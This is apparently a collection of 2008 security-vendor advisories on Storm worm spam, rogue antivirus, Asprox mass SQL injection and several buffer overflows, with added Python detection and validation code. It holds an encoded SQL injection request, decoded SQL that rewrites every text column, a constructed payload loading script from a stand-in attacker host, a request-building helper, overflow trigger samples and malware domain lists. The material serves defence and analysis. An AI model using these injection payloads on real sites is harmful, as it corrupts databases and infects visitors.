
BBC Georgia's President Trojan (Aug 15, 2008)

Aug 15, 2008

Starting August 15, 2008, a new wave of malicious e-mails is being spammed with following subjects:

  • BBC NEWS.
  • Weekly BBC NEWS.
  • Your subscription.

The headline in the e-mail claims that Georgian president Mikheil Saakashvili is gay, and the message carries a linked image of the president taken from the BBC website.

The e-mails contain links pointing to the following domains:

  • aguadodecea.com
  • elitezeitung.de
  • farmaciacardelus.com
  • freeweb.8k.ro
  • petstogoodhomes.com
  • thecar.fr
  • transporter.tv
  • vishalkullarwar.com
  • www.oris-uk.com
  • xrevolution.de
  • and others

All of these locations redirect to a single IP address (79.135.167.49), which serves the malware as a file named “name.avi.exe”.

SonicWALL detects this new wave with the following signature:

GAV: FakeAlert.gen (Trojan)

Postcard Storm Wave (Aug 6, 2008)

Aug 6, 2008

A new wave of e-mails was discovered with the following subjects:

  • You Have An Ecard
  • A card for you
  • Someone sent you an Ecard.
  • Your Digital Greeting Card is waiting

They are pointing to the following domains:

  • bestlettercard.com
  • supergreetingcard.com
  • freepostcardonline.com
  • worldpostcardart.com
  • superlettercard.com
  • digitalaudiopostcard.com
  • audiopostcardmail.com
  • lettercardadvertising.com
  • yourlettercard.com
  • oldpostcardshop.com

Here are a few examples of such e-mails:

screenshot

The e-mail contains a fake message claiming that a neighbor or flatmate has sent the recipient a greeting card, along with a link. If the user clicks the link, a page opens and prompts the user to download postcard.exe, which is the new variant of the Storm worm.

screenshot

SonicWALL detects this new wave with the following signature:

GAV: Zhelatin.ZN_13 (Worm)

Cisco ActiveX Control Vulnerability (Aug 8, 2008)

A flaw has been discovered in the Cisco Webex Meeting Manager ActiveX control. The flaw creates an exploitable vulnerability that may be leveraged by remote attackers.

The affected ActiveX control exposes a method called NewObject, which takes a single string argument. During execution of this method, insufficient internal checks are performed on the argument: the code does not verify or enforce a length limit on the passed string, which is simply copied into a fixed-size stack buffer regardless of its size. A sufficiently long string therefore overwrites adjacent memory structures, which in turn may allow an attacker to divert the control flow of the application.

SonicWALL has added signature 3418 “Webex Meeting Manager (atucfobj.dll) ActiveX Control BO Attempt”, which detects and prevents generic attack attempts leveraging this vulnerability. Exploits for this vulnerability are known to exist.

SQL Injection Attack Wave (Aug 1, 2008)

In recent weeks a large number of SQL injection attacks have appeared on the Internet. These attacks use vulnerable ASP or PHP code to inject malicious SQL into the target database server. Furthermore, several SQL injection attack tools have been developed and released. These tools query an Internet search engine such as Google to find ASP/PHP pages as candidate targets, then inject the malicious SQL into those pages. The attack may affect the database directly, or even the users who later visit the infected pages. The Danmec/Asprox SQL injection attack tool is a good example.

These injections typically arrive as an HTTP request of the following form (the captured request is cut off partway through the hex payload):

GET /page.asp?id=xx;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C00410052004500200040005400200076006100720063006800610072002800320035003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C00410052004500200… HTTP/1.1
Host: www.example.com

The contents of the CAST function are the hexadecimal (UTF-16LE) encoding of the SQL statements to be executed, and they vary between attacks. One example of the decoded malicious code is listed below:

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET …
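The following Python code is an added example, not part of the original post or of SonicWALL's signature engine. It decodes the hex-encoded CAST() payload the way SQL Server does (as UTF-16LE code units), builds a request of the shape shown above around a constructed inner payload, and classifies it along the lines of the DECLARE/CAST/EXEC signature names that follow. The hex prefix is the one printed above; the full inner SQL is a shortened stand-in written for this example, since the page's copy breaks off after "SET".

```python
"""Decode and classify the hex-encoded CAST() payload used by the Asprox-style
SQL injection requests described above. Added example; the request it inspects
is constructed here from the fragments on this page, not captured traffic."""
import re
from urllib.parse import unquote

# Hex digits exactly as they appear in the CAST(0x...) on this page, joined across
# the line breaks. The captured request is cut off after this prefix.
PAGE_HEX_PREFIX = (
    "4400450043004C00410052004500200040"
    "00540020007600610072006300680061007200280032003500"
    "350029002C0040004300200076006100720063006800610072"
    "002800320035003500290020004400450043004C0041005200"
)

# Constructed, shortened stand-in for the full inner payload (the page's copy
# breaks off after "SET"); everything after SET is this example's own wording.
INNER_SQL = (
    "DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR "
    "SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' "
    "AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET "
    "['+@C+']=''<script src=http://attacker.invalid/x.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)


def encode_cast_payload(sql: str) -> str:
    """SQL Server reads CAST(0x... AS NVARCHAR) as UTF-16LE code units, so each
    ASCII character becomes two bytes (the character followed by 00)."""
    return sql.encode("utf-16-le").hex().upper()


def decode_cast_payload(hexdigits: str) -> str:
    """Inverse of encode_cast_payload; tolerates a capture truncated mid-character."""
    hexdigits = hexdigits.strip()
    if len(hexdigits) % 2:
        hexdigits = hexdigits[:-1]          # drop a dangling nibble
    raw = bytes.fromhex(hexdigits)
    raw = raw[: len(raw) - len(raw) % 2]    # keep whole UTF-16 code units only
    return raw.decode("utf-16-le", errors="replace")


CAST_RE = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)", re.I)
DECLARE_RE = re.compile(r"\bDECLARE\s+@\w+\s+N?VARCHAR\s*\(", re.I)
EXEC_RE = re.compile(r"\bEXEC\s*\(\s*@\w+\s*\)", re.I)


def inspect_request(request: str) -> dict:
    """URL-decode the request line, decode any hex CAST() body and classify it
    in the spirit of the signature names listed on this page."""
    request_line = request.splitlines()[0]
    target = request_line.split(" ")[1] if request_line.startswith("GET ") else request_line
    decoded = unquote(target)
    cast = CAST_RE.search(decoded)
    inner = decode_cast_payload(cast.group(1)) if cast else ""
    outer_declare = bool(DECLARE_RE.search(decoded))
    exec_call = bool(EXEC_RE.search(decoded))
    if cast and outer_declare and exec_call:
        verdict = "DECLARE CAST EXEC (highly possible SQL injection)"
    elif cast and outer_declare and inner.upper().startswith("DECLARE"):
        verdict = "DECLARE CAST DECLARE (possible SQL injection)"
    elif cast and exec_call:
        verdict = "CAST EXEC (possible SQL injection)"
    else:
        verdict = "no match"
    return {"verdict": verdict, "inner_sql": inner,
            "mass_update": bool(re.search(r"EXEC\s*\(\s*'UPDATE", inner, re.I))}


def build_request(inner_sql: str, host: str = "www.example.com") -> str:
    """Assemble a request of the shape shown above around a hex-encoded payload."""
    query = ("id=xx;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
             + encode_cast_payload(inner_sql)
             + "%20AS%20NVARCHAR(4000));EXEC(@S);--")
    return f"GET /page.asp?{query} HTTP/1.1\r\nHost: {host}\r\n\r\n"


if __name__ == "__main__":
    print(decode_cast_payload(PAGE_HEX_PREFIX))
    result = inspect_request(build_request(INNER_SQL))
    print(result["verdict"], "| mass update:", result["mass_update"])
```

Decoding the page's own hex prefix yields "DECLARE @T varchar(255),@C varchar(255) DECLAR", i.e. the start of the cursor loop shown above; the classifier keys on the same outer DECLARE / CAST / EXEC tokens the IPS signatures are named after, and separately reports whether the decoded body performs the mass UPDATE that injects a script tag into every text column.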

In response to these attacks, SonicWALL UTM team has created the following IPS signatures:

  • 1062 DECLARE CURSOR EXEC Attempt (Highly Possible SQL Injection)
  • 1092 CAST EXEC Attempt (Possible SQL Injection)
  • 1445 DECLARE CAST EXEC Attempt (Highly Possible SQL Injection)
  • 1074 DECLARE CAST EXEC Attempt 2 (Highly Possible SQL Injection)
  • 1079 DECLARE CAST EXEC Attempt 3 (Highly Possible SQL Injection)
  • 1080 DECLARE CAST EXEC Attempt 4 (Highly Possible SQL Injection)
  • 1111 DECLARE CAST DECLARE Attempt 1 (Possible SQL Injection)
  • 1112 DECLARE CAST DECLARE Attempt 2 (Possible SQL Injection)
  • 1113 DECLARE CAST DECLARE Attempt 3 (Possible SQL Injection)
  • 1114 DECLARE CAST DECLARE Attempt 4 (Possible SQL Injection)
  • 3336 SQL Inject Attack Attempt

These signatures detect most of the attack cases described above. The following figure shows the SQL injection attack activity over the last two months.

The figure shows that these attacks began at the end of June and are still ongoing. The SonicWALL UTM team will continue monitoring the attacks and release up-to-date information about them.

New F.B.I. vs Facebook Storm Wave (July 31, 2008)

July 31, 2008

Storm worm authors have changed their spam campaign, which now involves a fake news story about the FBI and Facebook. Starting July 29, 2008, a new wave of Storm e-mails is being spammed with the following subjects:

  • F.B.I. can watch our conversation through Facebook
  • FBI agents patrol Facebook
  • FBI may strike Facebook
  • FBI on the Hunt for Facebook users
  • F.B.I. bypasses Facebook to nail you
  • F.B.I. Looks Into Facebook
  • F.B.I. are spying on your Facebook profiles
  • F.B.I. busts alleged Facebook
  • Get Facebooks F.B.I. Files
  • Facebooks F.B.I. ties
  • F.B.I. watching you
  • The FBIs plan to profile Facebook
  • The FBI has a new way of tracking Facebook

In this new wave, they are using IP Addresses or a domain in the URL spammed via e-mail. Here are a few examples of such e-mails:

screenshot

The user will see the following page when he or she clicks on the link in the e-mail:

screenshot

The e-mail contains a fake message about the FBI and Facebook. If the user clicks the link on the page, it prompts the user to download fbi_facebook.exe, which is the new variant of the Storm worm.

screenshot

It also drops the following files on the system:

C:\WINDOWS\glok+serv.config
C:\WINDOWS\glok+59e6-7783.sys

It also creates a new service for the glok+59e6-7783.sys and runs it.

SonicWALL detects this new wave with following signatures:

GAV: Zhelatin.ZI (Worm) – Released on July 23, 2008
GAV: Zhelatin.ZM (Worm) – Released on July 29, 2008
GAV: Zhelatin.ZM_2 (Worm) – Released on July 30, 2008

screenshot

New Amero Storm Wave (July 22, 2008)

July 22, 2008

A new spammed wave of Storm e-mails was discovered on July 21, 2008. The Storm worm authors have changed their social engineering theme in this wave, and the e-mails arrive with the following subjects:

  • Amero – the secret currency
  • Amero arrives
  • Amero currency Union is now the reality
  • Amero is not a myth
  • AMERO to replace Dollar
  • Bye bye dollar, hello amero
  • Collapse of the Dollar
  • Death of the U.S. Dollar
  • Dollar is replacing by Amero
  • Dollar is replacing by new currency
  • Fall of the Dollar, beginning of AMERO
  • No dollars anymore
  • North American Union is the reality now
  • One Currency for Canada, U.S and Mexico – The Amero
  • Say Goodbye to the Dollar
  • The Amero is here
  • The Dollar disappeared
  • The new currency is coming
  • Welcome the Amero
  • You can forget about Dollars

They have also reverted to their old format of using IP addresses instead of fast-flux domains in the URL spammed via e-mail. The spammed e-mail looks like the following:

screenshot

The user will see the following page when he or she clicks on the link in the e-mail:

screenshot

No North American currency union exists; the new Storm social engineering campaign is likely exploiting the theme because of the recent economic slowdown. The web page also contains a hidden iframe to a script named ind.php that serves drive-by exploits. SonicWALL blocks this script with the GAV: PackTibs.O (Trojan) signature, which has triggered 2,794 times since it was created on June 22, 2008.

If the user clicks the icon on the page, it prompts the user to download amero.exe, which is the new variant of the Storm worm.

screenshot

It also drops the following files on the system:

C:\WINDOWS\glok+serv.config
C:\WINDOWS\glok+40bc-761f.sys

It also creates a new service for the glok+40bc-761f.sys and starts it.

SonicWALL detects this new variant with GAV: Zhelatin.ZI (Worm) signature.

screenshot

Java Web Start Vulnerability (July 25, 2008)

July 25, 2008

Java Web Start is a framework developed by Sun Microsystems. Unlike Java applets, Web Start applications do not run inside the browser, which allows an application to implement richer functionality while still preserving sandbox-level security. Java Network Launching Protocol (JNLP) is an XML-based protocol that specifies how Java Web Start applications are launched.

A stack-based buffer overflow vulnerability exists in Sun Java Web Start. The vulnerability, which has been assigned CVE-2008-3111, is due to improper handling of attributes of the j2se element within a JNLP file. Specifically, the vulnerable code copies the values of the “initial-heap-size” and “max-heap-size” attributes with sprintf() without checking their length. A remote attacker can exploit this by enticing the target user to open a crafted JNLP file, potentially causing arbitrary code to be injected and executed in the context of the current user.
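As an added illustration of the input this vulnerability requires (this is not SonicWALL's signature logic and not Sun's code), the following Python check parses a JNLP file and rejects any j2se heap-size attribute that does not match the integer-plus-optional-k/m/g-suffix form Java accepts, so an overlong value never reaches the native launcher. Both sample JNLP files are constructed here; the accepted syntax is this example's own choice.

```python
"""Validate the j2se heap-size attributes of a JNLP file before it is launched.
Added example, not SonicWALL's signature logic; the sample files are constructed
here and the accepted value syntax is this example's own choice."""
import re
import xml.etree.ElementTree as ET

# Java accepts heap sizes as an integer with an optional k/m/g suffix ("64m").
# Anything else, including an overlong run of characters, is rejected outright.
HEAP_SIZE_RE = re.compile(r"^\d{1,10}[kKmMgG]?$")
HEAP_ATTRS = ("initial-heap-size", "max-heap-size")


def check_jnlp(jnlp_xml: str) -> list:
    """Return findings for every j2se/java element whose heap-size attributes do
    not match the accepted syntax; an empty list means the file looks sane."""
    findings = []
    root = ET.fromstring(jnlp_xml)
    for elem in root.iter():
        tag = elem.tag.rsplit("}", 1)[-1]        # tolerate a namespace prefix
        if tag not in ("j2se", "java"):
            continue
        for attr in HEAP_ATTRS:
            value = elem.get(attr)
            if value is not None and not HEAP_SIZE_RE.match(value):
                findings.append(f"{tag}@{attr}: rejected value of {len(value)} chars")
    return findings


# Constructed benign sample.
BENIGN_JNLP = """<jnlp spec="1.0+" codebase="http://app.example.invalid/" href="app.jnlp">
  <information><title>Demo</title><vendor>Example</vendor></information>
  <resources>
    <j2se version="1.6+" initial-heap-size="64m" max-heap-size="256m"/>
    <jar href="app.jar"/>
  </resources>
  <application-desc main-class="demo.Main"/>
</jnlp>"""

# Constructed trigger-shaped file: the same document with an initial-heap-size far
# longer than the buffer the unchecked sprintf() copies it into.
MALICIOUS_JNLP = BENIGN_JNLP.replace('initial-heap-size="64m"',
                                     'initial-heap-size="' + "A" * 4096 + '"')

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_JNLP), ("malicious", MALICIOUS_JNLP)):
        print(label, check_jnlp(doc) or "ok")
```

Validating the syntax rather than only capping the length is the point: a value Java could never interpret has no business reaching the launcher, whatever its size.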

SonicWALL has developed 2 IPS signatures for this vulnerability:

  • 5120 Java Web Start JNLP File initial-heap-size BO Attempt
  • 5121 Java Web Start JNLP File max-heap-size BO Attempt

These signatures detect and prevent malicious JNLP files from reaching the internal network.

Fake anti-spyware Antivirus 2009 (July 18, 2008)

July 18, 2008

A public beta of Norton Antivirus 2009 opened this week and the scammers didn’t wait long to follow suit with a new bogus scanner: Antivirus 2009.

Antivirus 2009, also known as Antivirus2009, is a rogue anti-spyware program that uses false spyware results to lure you to purchase its full version. Antivirus2009 is an updated version of Antivirus 2008.

Antivirus 2009 is usually promoted via a Zlob/MediaAccess codec installer found on adult websites. Zlob has been the trojan of choice for infecting users with pop-ups disguised as system notifications that lead to websites offering rogue anti-spyware programs. Antivirus 2009 can also be downloaded directly from the rogue websites:

More related URLs:

  • Antivirus-2009.com
  • antivirus-scanner.com
  • antivirus2009professional.com
  • antispyware2008purchase.com
  • virusremover2008.com
  • antivirus2009-freescan.com
  • antivirus2009-scanner.com
  • totalantivirusonline.com
  • virus9-webscanner.com
  • windows-scanner.com
  • xponlinescanner9.com
  • freewebscanner.com

screenshot

We recommend blocking the above domains by editing your local hosts file to redirect them to 127.0.0.1.

Clicking SCAN or CHECK YOUR PC pushes a file named “AV2009Install_0011.exe” onto the system. It is usually run-time compressed with the UPX or PolyCrypt packer. We have received at least 140 different variants of this threat.

When run it issues a GET HTTP request as follows:

GET /download/av2009b.exe HTTP/1.1
Host: antivirus-2009.com

screenshot

Then the fake antimalware product is installed and starts giving fake results and making the system unusable until a full version is purchased.

screenshot

screenshot

screenshot

SonicWALL is blocking this threat with GAV: XPAntivirus_12 (Adware) and GAV: Fakealert.TY (Trojan) signatures.

Adobe PDF Javascript Vulnerability (July 18, 2008)

July 18, 2008

The vulnerability is caused by a lack of proper boundary checks when processing arguments supplied to several JavaScript functions. Given a large string argument, a vulnerable function writes past the allotted stack buffer, corrupting local stack variables as well as the return address of the calling function. Exploitation can therefore divert execution to arbitrary code. Because the vulnerable application runs in the security context of the logged-in user, the exploit is limited to that context. The vulnerability has been assigned CVE-2007-5659.

The way JavaScript is stored in PDF files presents a number of difficulties for detecting malicious files. Firstly, to detect a malicious file the JavaScript code must be interpreted to determine its intent, which requires a JavaScript engine. Secondly, the JavaScript itself is compressed within the PDF file, so it must be decompressed before it can be analyzed. Lastly, the compressed stream has to be located within the PDF file, as it is usually a separate object referred to by an index defined in a previous JavaScript object definition.
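The following Python code is an added example (not SonicWALL's GAV implementation) that walks the three steps just described on a PDF it builds itself: it follows the /JS N 0 R reference to the stream object, inflates the FlateDecode'd stream, and flags string literals longer than an assumed threshold. The method name Collab.hypotheticalMethod and the 1024-character cutoff are placeholders, since this page does not name the vulnerable functions or their buffer sizes.

```python
"""Locate, inflate and inspect the JavaScript inside a PDF's stream objects.
Added example: the PDF is constructed in place, and the vulnerable function name
and the length threshold are placeholders, not values from this page."""
import re
import zlib

LONG_ARG = 1024   # assumed cutoff; the stack buffers involved are far smaller

JS_REF_RE = re.compile(rb"/JS\s+(\d+)\s+0\s+R")
# A string literal, optionally preceded by the call it is passed to directly.
STR_RE = re.compile(r"""(?:([A-Za-z_$][\w$.]*)\s*\(\s*)?(['"])(.*?)\2""", re.S)


def get_object(pdf: bytes, num: int) -> bytes:
    """Return the body of object `num` (between 'num 0 obj' and 'endobj')."""
    m = re.search(rb"(?<!\d)%d\s+0\s+obj(.*?)endobj" % num, pdf, re.S)
    if not m:
        raise ValueError(f"object {num} not found")
    return m.group(1)


def extract_js(pdf: bytes) -> list:
    """Follow each /JS N 0 R reference, cut the stream by its /Length, inflate it
    if the object is FlateDecode'd, and return the script texts."""
    scripts = []
    for num in sorted({int(n) for n in JS_REF_RE.findall(pdf)}):
        body = get_object(pdf, num)
        start = re.search(rb"stream\r?\n", body)
        if not start:
            continue                      # /JS given as a direct string: not handled here
        length = re.search(rb"/Length\s+(\d+)", body)   # direct /Length only
        if length:
            data = body[start.end(): start.end() + int(length.group(1))]
        else:
            data = body[start.end(): body.rfind(b"endstream")].rstrip(b"\r\n")
        if b"/FlateDecode" in body:
            data = zlib.decompress(data)
        scripts.append(data.decode("latin-1"))
    return scripts


def suspicious_strings(script: str, limit: int = LONG_ARG) -> list:
    """String literals longer than `limit`, paired with the function they are passed
    to when the literal is a direct argument (None when it is not)."""
    return [(name or None, len(s)) for name, _, s in STR_RE.findall(script) if len(s) > limit]


def make_pdf(js: str) -> bytes:
    """Minimal PDF whose OpenAction runs `js` from a FlateDecode'd stream object
    (constructed sample input, not a real-world file)."""
    stream = zlib.compress(js.encode("latin-1"))
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction << /S /JavaScript /JS 3 0 R >> >>",
        b"<< /Type /Pages /Kids [] /Count 0 >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(stream) + stream + b"\nendstream",
    ]
    out = b"%PDF-1.4\n"
    for i, obj in enumerate(objects, 1):
        out += b"%d 0 obj\n" % i + obj + b"\nendobj\n"
    return out + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


BENIGN_JS = 'app.alert("hello from the added example");'
# Constructed exploit-shaped script: one literal far larger than any fixed stack buffer.
MALICIOUS_JS = 'Collab.hypotheticalMethod("' + "A" * 4096 + '");'

if __name__ == "__main__":
    for label, js in (("benign", BENIGN_JS), ("malicious", MALICIOUS_JS)):
        for script in extract_js(make_pdf(js)):
            print(label, suspicious_strings(script) or "no long arguments")
```

A scanner that inspects only the deflated stream, as this one does, is the obverse of what the post says about GAV: the signatures match the compressed form so that no inflation step is needed on the wire, while an analyst's tool pays for the inflation to get a readable script. Real exploit files also build the long argument at run time (concatenation, unescape()), which a literal-length check like this one will not see; that is exactly why a JavaScript engine is needed for reliable intent analysis.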

SonicWALL has developed a series of GAV signatures to detect and prevent malicious PDF files from being transferred. These signatures detect the exploits that have been found in active use in the wild, and they match the malicious JavaScript code in its compressed form. Fourteen exploits are currently known to target this vulnerability, and all of them are covered. The following signatures cover this vulnerability:

  • PDF.JavaScript.L
  • PDF.JavaScript.K
  • PDF.JavaScript.J
  • PDF.JavaScript.I
  • PDF.JavaScript.H
  • PDF.JavaScript.G
  • PDF.JavaScript.F
  • PDF.JavaScript.E
  • PDF.JavaScript.D
  • PDF.JavaScript.C
  • PDF.JavaScript.B_2
  • PDF.JavaScript.A
  • PDF.JavaScript.CI.B
  • PDF.JavaScript.CI.A

CEO subpoena phishing attacks (April 16, 2008)

On April 14, 2008 hundreds of CEOs received an official-looking subpoena via e-mail requiring them to appear before a grand jury in San Diego. This was a targeted attack of the kind known as “whaling”. The e-mails were sent only to CEOs and looked legitimate, including the personalized name, phone number, and company of each recipient.

The e-mail contained a link to http://CACD-USCOURTS.COM to view the details of the “subpoena”. This domain had been registered by an individual in the UK two days before the attack, and the web server was hosted in China. The link actually led to a Trojan file posing as an Adobe Acrobat PDF Reader ActiveX control. Here is a screenshot of the subpoena e-mail.

SonicWALL released a GAV signature to protect against web downloads of malware exploiting the fake subpoena social engineering. The initial Trojan was first seen in the wild on April 14, 2008. Since April 15, 2008, users of SonicWALL’s Unified Threat Management technology have been protected against this threat with the GAV: Small.BSL (Trojan) signature.